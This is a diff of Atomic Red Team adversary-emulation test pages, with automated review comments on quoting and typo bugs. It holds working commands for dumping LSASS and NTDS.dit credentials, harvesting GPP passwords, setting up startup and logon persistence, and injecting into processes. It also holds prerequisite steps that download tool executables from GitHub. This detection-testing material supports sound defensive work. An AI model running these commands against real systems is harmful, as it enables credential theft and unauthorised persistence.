Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{dumpert_exe}
```
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
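Review bot: in the new Atomic Test #7 the input path is used unquoted in all three places: `if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}`, `New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null` and `-OutFile #{dumpert_exe}`. If PathToAtomicsFolder resolves to a directory containing a space, each of these breaks, and the prereq check then reports the tool as missing every time. Quote the placeholder (`Test-Path "#{dumpert_exe}"`), as the psexec prereq check corrected later in this same commit does. Separately, the description links outflanknl/Dumpert but the Get Prereq downloads the binary from the clr2of8 fork; pinning to a commit hash is the right call, but a one-line note on why the fork is used, plus a `Get-FileHash` comparison against a recorded hash after the download, would make this executable dependency auditable.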
@ -433,7 +518,7 @@ Manager and administrative permissions.
<br/>
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
## Atomic Test #9 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
@ -488,7 +573,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
<br/>
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
## Atomic Test #10 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@ -535,7 +620,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
<br/>
## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@ -578,7 +663,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
<br/>
## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@ -652,7 +737,7 @@ mkdir #{extract_path}
<br/>
<br/>
## Atomic Test #11 - GPP Passwords (findstr)
## Atomic Test #13 - GPP Passwords (findstr)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
**Supported Platforms:** Windows
@ -688,7 +773,7 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
<br/>
## Atomic Test #12 - GPP Passwords (Get-GPPPassword)
## Atomic Test #14 - GPP Passwords (Get-GPPPassword)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
@ -745,7 +830,7 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
<br/>
## Atomic Test #13 - LSASS read with pypykatz
## Atomic Test #15 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@ -804,7 +889,7 @@ pip3 install pypykatz
<br/>
<br/>
## Atomic Test #14 - Registry parse with pypykatz
## Atomic Test #16 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows

View File

@ -70,7 +70,7 @@ $input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f | Out-Null
}
```
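Review bot: `| Out-Null` only discards the standard output of `reg delete`; in the normal cleanup case, where the `Image File Execution Options\$item` key or its `Debugger` value no longer exists, reg.exe reports the failure on stderr, which still reaches the console, so the cleanup is not actually silenced. Redirect the error stream as well, for example `reg delete "...\$item" /v Debugger /f 2>$null | Out-Null` or `*>$null`, matching the `>nul 2>&1` pattern used for the cmd cleanups elsewhere in this commit.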

View File

@ -13,7 +13,8 @@
## Atomic Test #1 - Shortcut Modification
This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@ -23,16 +24,22 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| shortcut_file_path | shortcut modified and execute | path | shortcutname.url|
| shortcut_file_path | shortcut modified and execute | path | %temp%&#92;T1023_modified_shortcut.url|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}
```
#### Cleanup Commands:
```cmd
del -f #{shortcut_file_path} >nul 2>&1
```
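Review bot: `del -f #{shortcut_file_path} >nul 2>&1` in the cleanup uses a Unix-style switch; cmd's `del` takes `/F` (force) and `/Q` (quiet), so `-f` is parsed as a second file name. The shortcut is still removed, and the resulting "Could Not Find" message is hidden by the redirect, but the intent is clearer as `del /f /q #{shortcut_file_path} >nul 2>&1`. Splitting the attack command into three lines is the right fix for the old version, which wrote `[InternetShortcut]` to `test.url` and then appended `URL=` to `#{shortcut_file_path}`.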
@ -42,7 +49,8 @@ echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #
<br/>
## Atomic Test #2 - Create shortcut to cmd in startup folders
LNK file to launch CMD placed in startup folder
LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
to view the new shortcut.
**Supported Platforms:** Windows

View File

@ -20,7 +20,7 @@
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
@ -50,7 +50,7 @@ Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
Upon successful execution, cmd will spawn calc.exe on a remote computer.
Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
@ -63,11 +63,11 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
| computer_name | Name of Computer | string | computer1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
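Review bot: `Documnet` in `...GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand(...)` is a typo carried over from the removed line; the MMC20.Application object exposes `Document`, so the test fails on member lookup before `ExecuteShellCommand` is ever reached and the "cmd will spawn calc.exe on a remote computer" result in the description cannot occur. Fix the member name while the executor is being switched to `powershell`. The executor change itself is correct, since `[activator]::CreateInstance(...)` and `$null` are PowerShell syntax.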

View File

@ -35,7 +35,7 @@ sc start Fax
#### Cleanup Commands:
```cmd
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
```

View File

@ -35,7 +35,7 @@ Upon successful execution, powershell will make a network connection to 127.0.0.
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
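Review bot: quoting the port in the changed line is fine, but the real problem is two lines up: `$server_ip = #{server_ip}` is a parse error once an address literal is substituted (`$server_ip = 127.0.0.1` is not valid PowerShell), and neither `$server_ip` nor `$server_port` is used afterwards because the constructor repeats the placeholders. Quote the assignments (`$server_ip = '#{server_ip}'` and `$server_port = [int]'#{server_port}'`) and call `New-Object Net.Sockets.TcpClient($server_ip, $server_port)`, which also removes the need to quote the port in the constructor.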

View File

@ -77,7 +77,7 @@ Upon successful execution, powershell will download psexec.exe and spawn calc.ex
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell

View File

@ -28,7 +28,8 @@ Mac allows login and logoff hooks to be run as root whenever a specific user log
<br/>
## Atomic Test #1 - Logon Scripts
Adds a registry value to run batch script created in the C:\Windows\Temp directory.
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
@ -38,7 +39,7 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Path to .bat file | String | $env:SystemRoot&#92;Temp&#92;art.bat|
| script_path | Path to .bat file | String | %temp%&#92;art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037-log.txt|
@ -46,15 +47,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
```cmd
echo cmd /c "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
```
#### Cleanup Commands:
```cmd
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
del #{script_path} >nul 2>nul
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
del #{script_path} >nul 2>&1
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
```
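Review bot: `echo "#{script_command}" > #{script_path}` writes the surrounding double quotes into the batch file, because cmd's `echo` does not strip them. With the default `script_command` shown in the inputs table (`echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt`), the first line of art.bat then begins with a quote, and cmd treats the quoted span `echo Art ` as a program name rather than running echo, so the logon script fails without ever writing T1037-log.txt. The removed form `echo cmd /c "#{script_command}" > #{script_path}` worked because `cmd /c` strips the outer pair of quotes before executing. Either restore the `cmd /c` wrapper or drop the quotes and escape the redirection inside the default command (`^>^>`) so it survives the outer `echo`. Adding `/f` to `REG.exe ADD` is a good change; it stops the cleanup from prompting when the value already exists.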
@ -65,7 +66,8 @@ del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
<br/>
## Atomic Test #2 - Scheduled Task Startup Script
Run an exe on user logon or system startup
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
@ -83,8 +85,8 @@ schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c ca
#### Cleanup Commands:
```cmd
schtasks /delete /tn "T1037_OnLogon" /f
schtasks /delete /tn "T1037_OnStartup" /f
schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1
```
@ -129,7 +131,9 @@ Mac logon script
<br/>
## Atomic Test #4 - Supicious vbs file run from startup Folder
vbs files can be placed in and ran from the startup folder to maintain persistance
vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
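Review bot: the new description line keeps `persistance` (persistence) and the heading on the context line above it keeps `Supicious` (Suspicious); the message text `T1137 Hello, World VBS!` also looks like a typo for T1037, the technique this file covers (the scheduled task names and log file elsewhere in the file use T1037). The same spellings and the same T1137 string recur in the Test #5 and Test #6 hunks below, so fix all three together.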
@ -162,7 +166,9 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Supicious jse file run from startup Folder
jse files can be placed in and ran from the startup folder to maintain persistance.
Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
Upon execution, "T1137 Hello, World JSE!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
@ -195,7 +201,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Supicious bat file run from startup Folder
bat files can be placed in and executed from the startup folder to maintain persistance.
Upon execution, cmd will be run and immediately closed.
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows

View File

@ -21,9 +21,12 @@ Another variation of this technique can be performed by taking advantage of a we
## Atomic Test #1 - File System Permissions Weakness
This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace.
powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with malicious file )
Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify
the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled.
**Supported Platforms:** Windows
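Review bot: the added description names the weak-permission file as `%temp%\T1044_weak_permission_file.txt` in one sentence and `%temp%\T1044_weak_permission_file.exe` in the next; the new input default is the `.txt` path, so the second reference should match. Also `to%temp%` is missing a space, and "verify that it's contents read" should be "its contents".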
@ -32,7 +35,8 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_permission_file | check weak files permission | path | GoogleUpdate.exe|
| weak_permission_file | check weak files permission | path | $env:TEMP&#92;T1044_weak_permission_file.txt|
| malicious_file | File to replace weak permission file with | path | $env:TEMP&#92;T1044&#92;T1044_malicious_file.txt|
#### Attack Commands: Run with `powershell`!
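Review bot: The weak_permission_file description "check weak files permission" does not say what the input is; suggest "Path of the weakly permissioned file that is checked and then overwritten", mirroring the wording used for malicious_file.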
@ -40,12 +44,41 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
```powershell
Get-WmiObject win32_service | select PathName
get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force
```
#### Cleanup Commands:
```powershell
Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore
Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist on disk at specified location (#{weak_permission_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item #{weak_permission_file} -Force | Out-Null
Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file"
```
##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges
##### Check Prereq Commands:
```powershell
if (Test-Path #{malicious_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null
New-Item #{malicious_file} -Force | Out-Null
Set-Content -Path #{malicious_file} -Value "T1044 Malicious file"
```
<br/>
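Review bot: The unchanged `get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}"` line is now broken: it made sense when the default was GoogleUpdate.exe, but with the new default it expands to "C:\Program Files (x86)\Google\Update\$env:TEMP\T1044_weak_permission_file.txt", which does not exist, so the permission check errors out. It should be `get-acl "#{weak_permission_file}" | FL | findstr "FullControl"`. Separately, the second Get Prereq block hard-codes `New-Item -Type Directory -Path $env:TEMP\T1044\`, while the cleanup removes `(Split-Path #{malicious_file})`; if a user overrides malicious_file the prereq creates the wrong directory, so derive it the same way in both places.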

View File

@ -154,7 +154,7 @@ wmic process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
wmic process where name='#{process_to_execute}' delete
wmic process where name='#{process_to_execute}' delete >nul 2>&1
```
@ -190,7 +190,7 @@ wmic /node:"#{node}" process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
wmic /node:"#{node}" process where name='#{process_to_execute}' delete
wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
```

View File

@ -6,15 +6,15 @@ Adversaries may install a new service that can be configured to execute at start
## Atomic Tests
- [Atomic Test #1 - Service Installation](#atomic-test-1---service-installation)
- [Atomic Test #1 - Service Installation CMD](#atomic-test-1---service-installation-cmd)
- [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell)
<br/>
## Atomic Test #1 - Service Installation
Installs A Local Service.
## Atomic Test #1 - Service Installation CMD
Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
@ -67,7 +67,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Service Installation PowerShell
Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will output via stdout.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
**Supported Platforms:** Windows
@ -85,7 +85,7 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
```powershell
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
```

View File

@ -27,15 +27,13 @@ Malware commonly utilizes process injection to access system resources through w
- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
- [Atomic Test #2 - Process Injection via PowerSploit](#atomic-test-2---process-injection-via-powersploit)
- [Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-2---shared-library-injection-via-etcldsopreload)
- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
- [Atomic Test #3 - Shared Library Injection via LD_PRELOAD](#atomic-test-3---shared-library-injection-via-ld_preload)
- [Atomic Test #4 - Shared Library Injection via LD_PRELOAD](#atomic-test-4---shared-library-injection-via-ld_preload)
- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
- [Atomic Test #5 - Process Injection via C#](#atomic-test-5---process-injection-via-c)
- [Atomic Test #6 - svchost writing a file to a UNC path](#atomic-test-6---svchost-writing-a-file-to-a-unc-path)
- [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path)
<br/>
@ -43,7 +41,7 @@ Malware commonly utilizes process injection to access system resources through w
## Atomic Test #1 - Process Injection via mavinject.exe
Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
**Supported Platforms:** Windows
@ -86,41 +84,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
<br/>
## Atomic Test #2 - Process Injection via PowerSploit
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
Upon successful execution, powershell.exe will download `Invoke-DLLInjection.ps1` and use it to inject into the `T1055.dll` shared library file.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Integer | (get-process spoolsv).id|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
```
<br/>
<br/>
## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload.
@ -150,7 +115,7 @@ echo #{path_to_shared_library} > /etc/ld.so.preload
<br/>
<br/>
## Atomic Test #4 - Shared Library Injection via LD_PRELOAD
## Atomic Test #3 - Shared Library Injection via LD_PRELOAD
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
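Review bot: The context line under the renumbered heading says LD_PRELOAD will load "/etc/ld.so.preload"; that file is the preload list used by the previous test, whereas this test loads `#{path_to_shared_library}` via the environment variable. Since the heading is being edited anyway, correct the description in the same change.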
@ -181,7 +146,7 @@ LD_PRELOAD=#{path_to_shared_library} ls
<br/>
<br/>
## Atomic Test #5 - Process Injection via C#
## Atomic Test #4 - Process Injection via C#
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
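Review bot: "Excercises Five Techniques" in the context below the renumbered heading is misspelled; it should be "Exercises five techniques", which also matches the "exercises 5 techniques" wording in the next hunk header.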
@ -218,9 +183,9 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
<br/>
<br/>
## Atomic Test #6 - svchost writing a file to a UNC path
## Atomic Test #5 - svchost writing a file to a UNC path
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** Windows

View File

@ -29,6 +29,9 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a
## Atomic Test #1 - Security Software Discovery
Methods to identify Security Software on an endpoint
when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles
and specific security software.
**Supported Platforms:** Windows
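Review bot: "sucessfully" should be "successfully"; the same misspelling appears in every one of the five "when sucessfully executed" lines added to this file. Each of these sentences should also start with a capital letter and end with a period to match the surrounding descriptions.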
@ -39,7 +42,7 @@ Methods to identify Security Software on an endpoint
```cmd
netsh.exe advfirewall firewall show all profiles
netsh.exe advfirewall show allprofiles
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
@ -58,6 +61,8 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell
Methods to identify Security Software on an endpoint
when sucessfully executed, powershell is going to processes related AV products if they are running.
**Supported Platforms:** Windows
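Review bot: "powershell is going to processes related AV products if they are running" is missing its verb; suggest "PowerShell will display processes related to AV products if they are running".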
@ -84,6 +89,7 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps
Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ).
**Supported Platforms:** Linux, macOS
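Review bot: "display AV software it is running( Little snitch or carbon black )" has misplaced spacing and casing; suggest "display security software that is running (Little Snitch or Carbon Black)".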
@ -110,6 +116,8 @@ ps aux | grep CbOsxSensorService
## Atomic Test #4 - Security Software Discovery - Sysmon Service
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
**Supported Platforms:** Windows
@ -134,6 +142,8 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI
Discovery of installed antivirus products via a WMI query.
when sucessfully executed, the test is going to display installed AV software.
**Supported Platforms:** Windows

View File

@ -43,7 +43,7 @@ sh /tmp/art.sh
<br/>
## Atomic Test #2 - Create and Execute Batch Script
Creates and executes a simple batch script.
Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
**Supported Platforms:** Windows
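Review bot: "launh" should be "launch" in the added sentence.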
@ -54,24 +54,36 @@ Creates and executes a simple batch script.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
| script_to_create | Path of script to create. | path | C:&#92;Windows&#92;TEMP&#92;execute.bat|
| script_path | Path of script to create. | path | $env:TEMP&#92;T1064_script.bat|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `powershell`!
```cmd
C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
```powershell
Start-Process #{script_path}
```
#### Cleanup Commands:
```cmd
del #{script_to_create} >nul 2>&1
```powershell
Remove-Item #{script_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Batch file must exist on disk at specified location (#{script_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{script_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item #{script_path} -Force | Out-Null
Set-Content -Path #{script_path} -Value "#{command_to_execute}"
```
<br/>
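Review bot: The attack command is now only `Start-Process #{script_path}`, with the script itself written by Get Prereq Commands; the test is titled "Create and Execute Batch Script", so the "create" half of the technique no longer runs as part of the attack step and will not generate the file-creation telemetry the test previously did. Either keep the creation in the attack block or rename the test to reflect that it only executes a pre-staged script.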

View File

@ -12,7 +12,8 @@
<br/>
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell
Testing uncommonly used port utilizing PowerShell
Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful
port check will be displayed.
**Supported Platforms:** Windows
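Review bot: "exectuion" should be "execution". The sentence also promises details of "the successful port check"; Test-NetConnection still returns output (with TcpTestSucceeded set to False) when the port is closed, so say "the result of the port check will be displayed" instead.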
@ -30,7 +31,7 @@ Testing uncommonly used port utilizing PowerShell
```powershell
test-netconnection -ComputerName #{domain} -port #{port}
Test-NetConnection -ComputerName #{domain} -port #{port}
```

View File

@ -60,7 +60,8 @@ groups
<br/>
## Atomic Test #2 - Basic Permission Groups Discovery Windows
Basic Permission Groups Discovery for Windows
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
@ -86,7 +87,8 @@ net group "domain admins" /domain
<br/>
## Atomic Test #3 - Permission Groups Discovery PowerShell
Permission Groups Discovery utilizing PowerShell
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** Windows
@ -116,7 +118,8 @@ get-ADPrincipalGroupMembership #{user} | select name
<br/>
